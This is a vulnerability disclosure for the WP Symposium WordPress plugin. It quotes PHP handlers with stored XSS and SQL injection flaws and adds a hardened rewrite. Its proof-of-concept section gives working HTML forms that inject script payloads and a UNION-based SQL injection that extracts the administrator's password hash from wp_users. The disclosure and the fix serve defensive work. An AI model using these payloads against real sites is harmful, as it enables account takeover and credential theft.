$_POST['text'] is not escaped.
File: wp-symposium\ajax\profile_functions.php
$uid = $_POST['uid'];
$text = $_POST['text'];
$parent = $_POST['parent'];
if (is_user_logged_in()) {
    if ( ($text != __(addslashes("Write a comment..."), "wp-symposium")) && ($text != '') ) {
        $wpdb->query( $wpdb->prepare( "
            INSERT INTO ".$wpdb->base_prefix."symposium_comments
            ( subject_uid,
              author_uid,
              comment_parent,
              comment_timestamp,
              comment,
              is_group
            )
            VALUES ( %d, %d, %d, %s, %s, %s )",
            array(
                $uid,
                $current_user->ID,
                $parent,
                date("Y-m-d H:i:s"),
                $text,
                ''
            )
        ) );
    }
$_POST['compose_text'] is not escaped.
File: wp-symposium\ajax\mail_functions.php
$subject = strip_tags($_POST['compose_subject']);
$message = $_POST['compose_text'];
$previous = $_POST['compose_previous'];
$message = $message.$previous;
// Send mail
if ( $rows_affected = $wpdb->insert( $wpdb->base_prefix . "symposium_mail", array(
        'mail_from' => $current_user->ID,
        'mail_to' => $recipient->ID,
        'mail_sent' => date("Y-m-d H:i:s"),
        'mail_subject' => $subject,
        'mail_message' => $message
    ) ) ) {
    $return = __('Message sent to', WPS_TEXT_DOMAIN).' '.$recipient->display_name;
} else {
    $return = '<p><strong>'.__('There was a problem sending your mail to', WPS_TEXT_DOMAIN).' '.$recipient->display_name.'.</strong></p>';
}
$_POST['comment'] is not escaped.
File: wp-symposium\ajax\lounge_functions.php
$comment = $_POST['comment'];
if ( ($comment != __(addslashes("Add a comment.."), "wp-symposium")) && ($comment != '') ) {
    $wpdb->query( $wpdb->prepare( "
        INSERT INTO ".$wpdb->base_prefix."symposium_lounge
        ( author,
          added,
          comment
        )
        VALUES ( %d, %s, %s )",
        array(
            $current_user->ID,
            date("Y-m-d H:i:s"),
            $comment
        )
    ) );
}
$_POST['name'] is not escaped.
File: wp-symposium\ajax\gallery_functions.php
$name = $_POST['name'];
$sub_album = $_POST['sub_album'];
if ($sub_album == 'true') {
    $parent = $_POST['parent'];
} else {
    $parent = 0;
}
// Create new album
$wpdb->query( $wpdb->prepare( "
    INSERT INTO ".$wpdb->base_prefix."symposium_gallery
    ( parent_gid,
      name,
      description,
      owner,
      sharing,
      editing,
      created,
      updated,
      is_group
    )
    VALUES ( %d, %s, %s, %d, %s, %s, %s, %s, %s )",
    array(
        $parent,
        $name,
        '',
        $current_user->ID,
        'everyone',
        'nobody',
        date("Y-m-d H:i:s"),
        date("Y-m-d H:i:s"),
        ''
    )
) );
$_POST['tray'] is not escaped and is concatenated directly into the SQL string (outside of $wpdb->prepare), so it is an SQL injection, not only an XSS.
File: wp-symposium\ajax\mail_functions.php
$tray = $_POST['tray'];
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");
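For comparison, the two vulnerable patterns above (raw $_POST text inserted and later rendered, and $tray spliced into a column name) written the safe way. This is an added example, not WP Symposium's code or its vendor fix; it assumes a loaded WordPress environment ($wpdb, sanitize_text_field, wp_unslash, esc_html, current_time) and uses the table and column names from the snippets on this page, with the set of tray names assumed to be 'in' and 'out'.

```php
<?php
// Added example, not the plugin's own code. Hardened counterparts of the
// lounge comment insert and the unread-mail count shown above.

// 1. Stored XSS: clean the text on the way in, and escape on every render.
function wps_safe_add_lounge_comment( $wpdb, $author_id, $raw_comment ) {
    // wp_unslash() removes the slashes WordPress adds to $_POST values;
    // sanitize_text_field() strips tags, octets and control characters.
    $comment = sanitize_text_field( wp_unslash( $raw_comment ) );
    if ( $comment === '' ) {
        return false;
    }
    return $wpdb->query( $wpdb->prepare(
        "INSERT INTO {$wpdb->base_prefix}symposium_lounge ( author, added, comment )
         VALUES ( %d, %s, %s )",
        (int) $author_id,
        current_time( 'mysql' ),
        $comment
    ) );
}

// Sanitising on input is not a substitute for escaping on output: the stored
// value must still be HTML-escaped wherever it is echoed into a page.
function wps_render_comment( $stored_comment ) {
    return '<p class="lounge_comment">' . esc_html( $stored_comment ) . '</p>';
}

// 2. SQL injection: $tray becomes part of a column name, which prepare()
// cannot parameterise, so it is checked against a fixed whitelist first and
// the only user-controlled value left in the query goes through prepare().
function wps_safe_unread_count( $wpdb, $mail_from, $raw_tray ) {
    $allowed_trays = array( 'in', 'out' ); // assumed tray names
    if ( ! in_array( $raw_tray, $allowed_trays, true ) ) {
        return null; // unknown tray: refuse rather than build a query
    }
    $deleted_column = 'mail_' . $raw_tray . '_deleted';
    return (int) $wpdb->get_var( $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->base_prefix}symposium_mail
         WHERE mail_from = %d AND {$deleted_column} != 'on' AND mail_read != 'on'",
        (int) $mail_from
    ) );
}
```

The same input-sanitise/output-escape pair applies to the profile comment, mail message and album name handlers above, which store their $_POST values unchanged.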
Proof of Concept
You must be logged in, except for the lounge and gallery XSS.
Profile page XSS, visible at:
http://wordpress-instalation/?page_id=%profile_page_id%&uid=%user_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/profile_functions.php">
<input type="hidden" name="action" value="addComment">
<input type="hidden" name="parent" value="0"><br />
XSS: <input type="text" name="text" value="<script>alert(String.fromCharCode(88,83,83,50));</script>"><br />
<input type="submit" value="Add profile comment">
</form>
Then make your profile public:
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/profile_functions.php">
<input type="hidden" name="action" value="updatePersonal">
My User ID: <input type="text" name="uid"><br />
<input type="hidden" name="wall_share" value="public">
<input type="hidden" name="share" value="public">
<input type="submit" value="Make profile public">
</form>
User mailbox XSS, visible at:
http://wordpress-instalation/?page_id=%mail_page_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
<input type="hidden" name="action" value="sendMail">
Recipient User ID: <input type="text" name="compose_recipient_id"><br />
Title: <input type="text" name="compose_subject" value="My title"><br />
XSS: <input type="text" name="compose_text" value="<script>alert(String.fromCharCode(88,83,83));</script>"><br />
<input type="submit" value="Send message to another user">
</form>
Lounge XSS, visible at:
http://wordpress-instalation/?page_id=%lounge_page_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/lounge_functions.php">
<input type="hidden" name="action" value="add_comment">
XSS: <input type="text" name="comment" value="<script>alert(String.fromCharCode(88,83,83));</script>"><br />
<input type="submit" value="Add lounge post">
</form>
Gallery XSS, visible at:
http://wordpress-instalation/?page_id=%gallery_page_id%&embed=on&album_id=%album_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/gallery_functions.php">
<input type="hidden" name="action" value="create_album">
<input type="hidden" name="sub_album" value="false">
XSS: <input type="text" name="name" value="<script>alert(String.fromCharCode(88,83,83));</script>"><br />
<input type="submit" value="Create gallery">
</form>
SQL injection via the mail tray parameter. The message ID must be one of your own sent messages (you can find it on the user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread").
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
<input type="hidden" name="action" value="getMailMessage">
Message ID: <input type="text" name="mid"><br />
SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- "><br />
<input type="submit" value="Inject">
</form>
The returned value will appear between "[split]YOUR_RETURNED_VALUE[split]" in the response.
Timeline
- 22-10-2014: Discovered
- 13-11-2014: Vendor notified
- 16-11-2014: Version 14.11 released, issue resolved